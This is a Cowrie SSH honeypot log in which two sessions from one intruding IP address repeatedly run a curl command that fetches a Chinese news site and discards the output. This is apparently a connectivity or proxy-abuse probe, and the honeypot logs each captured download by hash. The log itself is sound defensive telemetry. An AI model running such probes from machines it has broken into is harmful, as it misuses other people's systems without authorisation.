{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.266527Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.267298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.275415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.276088Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.296652Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.304488Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.305155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.311355Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.312054Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.344305Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.345362Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.349972Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.350802Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.373496Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.378216Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.382401Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.383182Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.387825Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.390053Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.390790Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.395529Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.419793Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.420735Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.429792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.430576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.461086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.461899Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.466006Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.467087Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.469338Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.471523Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.474961Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.477488Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.491309Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.503694Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.504527Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.506583Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.507396Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.512206Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.543374Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.544313Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.547880Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.548813Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.559602Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.563637Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.567544Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.573974Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.584406Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.585214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.589242Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.590166Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.590701Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.595798Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.604794Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.624235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.625078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.631477Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.633707Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.634207Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.637054Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.639256Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.641302Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.665216Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.672391Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.673156Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.684664Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.685884Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.692134Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.696096Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.699178Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.700648Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.709489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.710162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.722392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.723867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.750516Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.753066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.753835Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.770872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.771887Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.793187Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
